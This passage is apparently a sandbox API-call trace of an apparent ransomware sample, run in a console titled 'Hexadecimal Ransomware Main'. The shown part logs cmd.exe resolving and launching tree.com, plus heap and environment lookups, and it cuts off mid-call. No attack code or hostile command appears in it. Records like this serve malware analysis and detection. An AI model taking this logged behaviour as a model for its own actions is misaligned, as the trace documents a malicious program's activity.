(HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256b9920 [0102.258] _tell (_FileHandle=3) returned 63 [0102.258] _close (_FileHandle=3) returned 0 [0102.258] malloc (_Size=0xffce) returned 0x1dc257e0160 [0102.259] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0102.260] _wcsicmp (_String1="tree", _String2="DIR") returned 16 [0102.260] _wcsicmp (_String1="tree", _String2="ERASE") returned 15 [0102.260] _wcsicmp (_String1="tree", _String2="DEL") returned 16 [0102.260] _wcsicmp (_String1="tree", _String2="TYPE") returned -7 [0102.260] _wcsicmp (_String1="tree", _String2="COPY") returned 17 [0102.260] _wcsicmp (_String1="tree", _String2="CD") returned 17 [0102.260] _wcsicmp (_String1="tree", _String2="CHDIR") returned 17 [0102.260] _wcsicmp (_String1="tree", _String2="RENAME") returned 2 [0102.260] _wcsicmp (_String1="tree", _String2="REN") returned 2 [0102.260] _wcsicmp (_String1="tree", _String2="ECHO") returned 15 [0102.260] _wcsicmp (_String1="tree", _String2="SET") returned 1 [0102.260] _wcsicmp (_String1="tree", _String2="PAUSE") returned 4 [0102.260] _wcsicmp (_String1="tree", _String2="DATE") returned 16 [0102.260] _wcsicmp (_String1="tree", _String2="TIME") returned 9 [0102.260] _wcsicmp (_String1="tree", _String2="PROMPT") returned 4 [0102.260] _wcsicmp (_String1="tree", _String2="MD") returned 7 [0102.260] _wcsicmp (_String1="tree", _String2="MKDIR") returned 7 [0102.260] _wcsicmp (_String1="tree", _String2="RD") returned 2 [0102.260] _wcsicmp (_String1="tree", _String2="RMDIR") returned 2 [0102.261] _wcsicmp (_String1="tree", _String2="PATH") returned 4 [0102.261] _wcsicmp (_String1="tree", _String2="GOTO") returned 13 [0102.261] _wcsicmp (_String1="tree", _String2="SHIFT") returned 1 [0102.261] _wcsicmp (_String1="tree", _String2="CLS") returned 17 [0102.261] _wcsicmp (_String1="tree", _String2="CALL") returned 17 [0102.261] _wcsicmp (_String1="tree", _String2="VERIFY") returned -2 [0102.261] _wcsicmp (_String1="tree", _String2="VER") returned -2 [0102.261] _wcsicmp (_String1="tree", _String2="VOL") returned -2 [0102.261] _wcsicmp (_String1="tree", _String2="EXIT") returned 15 [0102.261] _wcsicmp (_String1="tree", _String2="SETLOCAL") returned 1 [0102.261] _wcsicmp (_String1="tree", _String2="ENDLOCAL") returned 15 [0102.261] _wcsicmp (_String1="tree", _String2="TITLE") returned 9 [0102.261] _wcsicmp (_String1="tree", _String2="START") returned 1 [0102.261] _wcsicmp (_String1="tree", _String2="DPATH") returned 16 [0102.261] _wcsicmp (_String1="tree", _String2="KEYS") returned 9 [0102.261] _wcsicmp (_String1="tree", _String2="MOVE") returned 7 [0102.261] _wcsicmp (_String1="tree", _String2="PUSHD") returned 4 [0102.261] _wcsicmp (_String1="tree", _String2="POPD") returned 4 [0102.261] _wcsicmp (_String1="tree", _String2="ASSOC") returned 19 [0102.261] _wcsicmp (_String1="tree", _String2="FTYPE") returned 14 [0102.261] _wcsicmp (_String1="tree", _String2="BREAK") returned 18 [0102.261] _wcsicmp (_String1="tree", _String2="COLOR") returned 17 [0102.261] _wcsicmp (_String1="tree", _String2="MKLINK") returned 7 [0102.261] _wcsnicmp (_String1="tree", _String2="cmd ", _MaxCount=0x4) returned 17 [0102.261] malloc (_Size=0xffce) returned 0x1dc257f0140 [0102.262] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0102.262] GetProcessHeap () returned 0x1dc256b0000 [0102.262] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1ffac) returned 0x1dc256d86c0 [0102.266] SetErrorMode (uMode=0x0) returned 0x0 [0102.266] SetErrorMode (uMode=0x1) returned 0x0 [0102.266] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1dc256d86d0, lpFilePart=0x407419ecc0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x407419ecc0*="Desktop") returned 0x17 [0102.266] SetErrorMode (uMode=0x0) returned 0x1 [0102.266] GetProcessHeap () returned 0x1dc256b0000 [0102.266] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256d86c0, Size=0x4a) returned 0x1dc256d86c0 [0102.266] GetProcessHeap () returned 0x1dc256b0000 [0102.266] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256d86c0) returned 0x4a [0102.266] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0102.266] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0102.266] GetProcessHeap () returned 0x1dc256b0000 [0102.266] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1bc) returned 0x1dc256bc4a0 [0102.266] GetProcessHeap () returned 0x1dc256b0000 [0102.266] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x368) returned 0x1dc256bc670 [0102.266] GetProcessHeap () returned 0x1dc256b0000 [0102.267] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bc670, Size=0x1be) returned 0x1dc256bc670 [0102.267] GetProcessHeap () returned 0x1dc256b0000 [0102.267] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bc670) returned 0x1be [0102.267] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0102.267] GetProcessHeap () returned 0x1dc256b0000 [0102.267] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256bc840 [0102.267] GetProcessHeap () returned 0x1dc256b0000 [0102.267] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bc840, Size=0x7e) returned 0x1dc256bc840 [0102.267] GetProcessHeap () returned 0x1dc256b0000 [0102.267] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bc840) returned 0x7e [0102.267] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0102.267] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0xffffffffffffffff [0102.267] GetLastError () returned 0x2 [0102.267] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0102.267] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0xffffffffffffffff [0102.271] GetLastError () returned 0x2 [0102.271] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0102.271] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0x1dc256bee40 [0102.271] GetProcessHeap () returned 0x1dc256b0000 [0102.271] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256b1380, Size=0x8) returned 0x1dc256b1380 [0102.271] FindClose (in: hFindFile=0x1dc256bee40 | out: hFindFile=0x1dc256bee40) returned 1 [0102.272] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.COM", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0x1dc256bede0 [0102.272] FindClose (in: hFindFile=0x1dc256bede0 | out: hFindFile=0x1dc256bede0) returned 1 [0102.272] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0102.272] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0102.272] ??_V@YAXPEAX@Z () returned 0x1 [0102.272] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0102.286] malloc (_Size=0xffce) returned 0x1dc257f0140 [0102.286] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0102.286] malloc (_Size=0xffce) returned 0x1dc25800120 [0102.287] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0102.287] _wcsicmp (_String1="tree", _String2="DIR") returned 16 [0102.287] _wcsicmp (_String1="tree", _String2="ERASE") returned 15 [0102.287] _wcsicmp (_String1="tree", _String2="DEL") returned 16 [0102.287] _wcsicmp (_String1="tree", _String2="TYPE") returned -7 [0102.287] _wcsicmp (_String1="tree", _String2="COPY") returned 17 [0102.287] _wcsicmp (_String1="tree", _String2="CD") returned 17 [0102.287] _wcsicmp (_String1="tree", _String2="CHDIR") returned 17 [0102.287] _wcsicmp (_String1="tree", _String2="RENAME") returned 2 [0102.287] _wcsicmp (_String1="tree", _String2="REN") returned 2 [0102.288] _wcsicmp (_String1="tree", _String2="ECHO") returned 15 [0102.288] _wcsicmp (_String1="tree", _String2="SET") returned 1 [0102.288] _wcsicmp (_String1="tree", _String2="PAUSE") returned 4 [0102.288] _wcsicmp (_String1="tree", _String2="DATE") returned 16 [0102.288] _wcsicmp (_String1="tree", _String2="TIME") returned 9 [0102.288] _wcsicmp (_String1="tree", _String2="PROMPT") returned 4 [0102.288] _wcsicmp (_String1="tree", _String2="MD") returned 7 [0102.288] _wcsicmp (_String1="tree", _String2="MKDIR") returned 7 [0102.288] _wcsicmp (_String1="tree", _String2="RD") returned 2 [0102.288] _wcsicmp (_String1="tree", _String2="RMDIR") returned 2 [0102.288] _wcsicmp (_String1="tree", _String2="PATH") returned 4 [0102.288] _wcsicmp (_String1="tree", _String2="GOTO") returned 13 [0102.288] _wcsicmp (_String1="tree", _String2="SHIFT") returned 1 [0102.288] _wcsicmp (_String1="tree", _String2="CLS") returned 17 [0102.288] _wcsicmp (_String1="tree", _String2="CALL") returned 17 [0102.288] _wcsicmp (_String1="tree", _String2="VERIFY") returned -2 [0102.288] _wcsicmp (_String1="tree", _String2="VER") returned -2 [0102.288] _wcsicmp (_String1="tree", _String2="VOL") returned -2 [0102.288] _wcsicmp (_String1="tree", _String2="EXIT") returned 15 [0102.288] _wcsicmp (_String1="tree", _String2="SETLOCAL") returned 1 [0102.288] _wcsicmp (_String1="tree", _String2="ENDLOCAL") returned 15 [0102.288] _wcsicmp (_String1="tree", _String2="TITLE") returned 9 [0102.288] _wcsicmp (_String1="tree", _String2="START") returned 1 [0102.288] _wcsicmp (_String1="tree", _String2="DPATH") returned 16 [0102.288] _wcsicmp (_String1="tree", _String2="KEYS") returned 9 [0102.288] _wcsicmp (_String1="tree", _String2="MOVE") returned 7 [0102.288] _wcsicmp (_String1="tree", _String2="PUSHD") returned 4 [0102.289] _wcsicmp (_String1="tree", _String2="POPD") returned 4 [0102.289] _wcsicmp (_String1="tree", _String2="ASSOC") returned 19 [0102.289] _wcsicmp (_String1="tree", _String2="FTYPE") returned 14 [0102.289] _wcsicmp (_String1="tree", _String2="BREAK") returned 18 [0102.289] _wcsicmp (_String1="tree", _String2="COLOR") returned 17 [0102.289] _wcsicmp (_String1="tree", _String2="MKLINK") returned 7 [0102.289] _wcsicmp (_String1="tree", _String2="DIR") returned 16 [0102.289] _wcsicmp (_String1="tree", _String2="ERASE") returned 15 [0102.289] _wcsicmp (_String1="tree", _String2="DEL") returned 16 [0102.289] _wcsicmp (_String1="tree", _String2="TYPE") returned -7 [0102.289] _wcsicmp (_String1="tree", _String2="COPY") returned 17 [0102.289] _wcsicmp (_String1="tree", _String2="CD") returned 17 [0102.289] _wcsicmp (_String1="tree", _String2="CHDIR") returned 17 [0102.289] _wcsicmp (_String1="tree", _String2="RENAME") returned 2 [0102.289] _wcsicmp (_String1="tree", _String2="REN") returned 2 [0102.289] _wcsicmp (_String1="tree", _String2="ECHO") returned 15 [0102.289] _wcsicmp (_String1="tree", _String2="SET") returned 1 [0102.289] _wcsicmp (_String1="tree", _String2="PAUSE") returned 4 [0102.289] _wcsicmp (_String1="tree", _String2="DATE") returned 16 [0102.289] _wcsicmp (_String1="tree", _String2="TIME") returned 9 [0102.289] _wcsicmp (_String1="tree", _String2="PROMPT") returned 4 [0102.289] _wcsicmp (_String1="tree", _String2="MD") returned 7 [0102.289] _wcsicmp (_String1="tree", _String2="MKDIR") returned 7 [0102.289] _wcsicmp (_String1="tree", _String2="RD") returned 2 [0102.289] _wcsicmp (_String1="tree", _String2="RMDIR") returned 2 [0102.289] _wcsicmp (_String1="tree", _String2="PATH") returned 4 [0102.290] _wcsicmp (_String1="tree", _String2="GOTO") returned 13 [0102.290] _wcsicmp (_String1="tree", _String2="SHIFT") returned 1 [0102.290] _wcsicmp (_String1="tree", _String2="CLS") returned 17 [0102.290] _wcsicmp (_String1="tree", _String2="CALL") returned 17 [0102.290] _wcsicmp (_String1="tree", _String2="VERIFY") returned -2 [0102.290] _wcsicmp (_String1="tree", _String2="VER") returned -2 [0102.290] _wcsicmp (_String1="tree", _String2="VOL") returned -2 [0102.290] _wcsicmp (_String1="tree", _String2="EXIT") returned 15 [0102.290] _wcsicmp (_String1="tree", _String2="SETLOCAL") returned 1 [0102.290] _wcsicmp (_String1="tree", _String2="ENDLOCAL") returned 15 [0102.290] _wcsicmp (_String1="tree", _String2="TITLE") returned 9 [0102.290] _wcsicmp (_String1="tree", _String2="START") returned 1 [0102.290] _wcsicmp (_String1="tree", _String2="DPATH") returned 16 [0102.290] _wcsicmp (_String1="tree", _String2="KEYS") returned 9 [0102.290] _wcsicmp (_String1="tree", _String2="MOVE") returned 7 [0102.290] _wcsicmp (_String1="tree", _String2="PUSHD") returned 4 [0102.290] _wcsicmp (_String1="tree", _String2="POPD") returned 4 [0102.290] _wcsicmp (_String1="tree", _String2="ASSOC") returned 19 [0102.290] _wcsicmp (_String1="tree", _String2="FTYPE") returned 14 [0102.290] _wcsicmp (_String1="tree", _String2="BREAK") returned 18 [0102.290] _wcsicmp (_String1="tree", _String2="COLOR") returned 17 [0102.290] _wcsicmp (_String1="tree", _String2="MKLINK") returned 7 [0102.290] _wcsicmp (_String1="tree", _String2="FOR") returned 14 [0102.290] _wcsicmp (_String1="tree", _String2="IF") returned 11 [0102.290] _wcsicmp (_String1="tree", _String2="REM") returned 2 [0102.290] ??_V@YAXPEAX@Z () returned 0x1 [0102.291] GetProcessHeap () returned 0x1dc256b0000 [0102.291] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xffde) returned 0x1dc256d8720 [0102.291] GetProcessHeap () returned 0x1dc256b0000 [0102.291] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256b1640 [0102.291] _wcsnicmp (_String1="tree", _String2="cmd ", _MaxCount=0x4) returned 17 [0102.291] malloc (_Size=0xffce) returned 0x1dc25800120 [0102.292] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0102.292] GetProcessHeap () returned 0x1dc256b0000 [0102.292] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1ffac) returned 0x1dc256e8710 [0102.294] SetErrorMode (uMode=0x0) returned 0x0 [0102.294] SetErrorMode (uMode=0x1) returned 0x0 [0102.294] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1dc256e8720, lpFilePart=0x407419e520 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x407419e520*="Desktop") returned 0x17 [0102.294] SetErrorMode (uMode=0x0) returned 0x1 [0102.294] GetProcessHeap () returned 0x1dc256b0000 [0102.294] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256e8710, Size=0x4a) returned 0x1dc256e8710 [0102.294] GetProcessHeap () returned 0x1dc256b0000 [0102.294] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256e8710) returned 0x4a [0102.294] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0102.294] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0102.294] GetProcessHeap () returned 0x1dc256b0000 [0102.294] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1bc) returned 0x1dc256bc8d0 [0102.294] GetProcessHeap () returned 0x1dc256b0000 [0102.294] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x368) returned 0x1dc256bcaa0 [0102.294] GetProcessHeap () returned 0x1dc256b0000 [0102.294] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bcaa0, Size=0x1be) returned 0x1dc256bcaa0 [0102.294] GetProcessHeap () returned 0x1dc256b0000 [0102.294] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bcaa0) returned 0x1be [0102.294] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0102.294] GetProcessHeap () returned 0x1dc256b0000 [0102.294] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256bcc70 [0102.294] GetProcessHeap () returned 0x1dc256b0000 [0102.294] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bcc70, Size=0x7e) returned 0x1dc256bcc70 [0102.294] GetProcessHeap () returned 0x1dc256b0000 [0102.296] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bcc70) returned 0x7e [0102.297] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0102.297] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0xffffffffffffffff [0102.297] GetLastError () returned 0x2 [0102.297] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0102.297] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0xffffffffffffffff [0102.297] GetLastError () returned 0x2 [0102.298] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0102.298] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0x1dc256beba0 [0102.298] FindClose (in: hFindFile=0x1dc256beba0 | out: hFindFile=0x1dc256beba0) returned 1 [0102.298] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.COM", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0x1dc256beb40 [0102.298] FindClose (in: hFindFile=0x1dc256beb40 | out: hFindFile=0x1dc256beb40) returned 1 [0102.298] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0102.298] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0102.298] ??_V@YAXPEAX@Z () returned 0x1 [0102.299] GetConsoleTitleW (in: lpConsoleTitle=0x407419e810, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0102.329] InitializeProcThreadAttributeList (in: lpAttributeList=0x407419e730, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x407419e620 | out: lpAttributeList=0x407419e730, lpSize=0x407419e620) returned 1 [0102.329] UpdateProcThreadAttribute (in: lpAttributeList=0x407419e730, dwFlags=0x0, Attribute=0x60001, lpValue=0x407419e60c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x407419e730, lpPreviousValue=0x0) returned 1 [0102.329] GetStartupInfoW (in: lpStartupInfo=0x407419e6c0 | out: lpStartupInfo=0x407419e6c0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0102.329] GetProcessHeap () returned 0x1dc256b0000 [0102.329] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x20) returned 0x1dc256bbb30 [0102.329] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0102.329] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0102.329] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0102.329] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0102.329] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0102.329] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0102.329] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0102.329] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0102.329] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0102.329] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0102.329] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0102.329] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0102.329] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0102.330] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0102.331] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0102.331] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0102.331] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0102.331] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0102.331] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0102.331] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0102.331] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0102.331] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0102.331] GetProcessHeap () returned 0x1dc256b0000 [0102.331] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bbb30) returned 1 [0102.331] GetProcessHeap () returned 0x1dc256b0000 [0102.331] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x12) returned 0x1dc256b9020 [0102.331] lstrcmpW (lpString1="\\tree.com", lpString2="\\XCOPY.EXE") returned -1 [0102.333] _get_osfhandle (_FileHandle=1) returned 0x50 [0102.333] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0102.385] _get_osfhandle (_FileHandle=0) returned 0x4c [0102.385] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0102.449] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\tree.com", lpCommandLine="tree", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x407419e650*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tree", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x407419e628 | out: lpCommandLine="tree", lpProcessInformation=0x407419e628*(hProcess=0xa0, hThread=0x9c, dwProcessId=0xe04, dwThreadId=0x1210)) returned 1 [0102.517] CloseHandle (hObject=0x9c) returned 1 [0102.518] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0102.518] GetProcessHeap () returned 0x1dc256b0000 [0102.518] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9970) returned 1 [0102.518] GetEnvironmentStringsW () returned 0x1dc256b9950* [0102.518] GetProcessHeap () returned 0x1dc256b0000 [0102.518] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe9c) returned 0x1dc256bd250 [0102.518] FreeEnvironmentStringsA (penv="=") returned 1 [0102.518] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0xffffffff) returned 0x0 [0103.596] GetExitCodeProcess (in: hProcess=0xa0, lpExitCode=0x407419e5a8 | out: lpExitCode=0x407419e5a8*=0x0) returned 1 [0103.596] CloseHandle (hObject=0xa0) returned 1 [0103.597] _vsnwprintf (in: _Buffer=0x407419e778, _BufferCount=0x13, _Format="%08X", _ArgList=0x407419e5b8 | out: 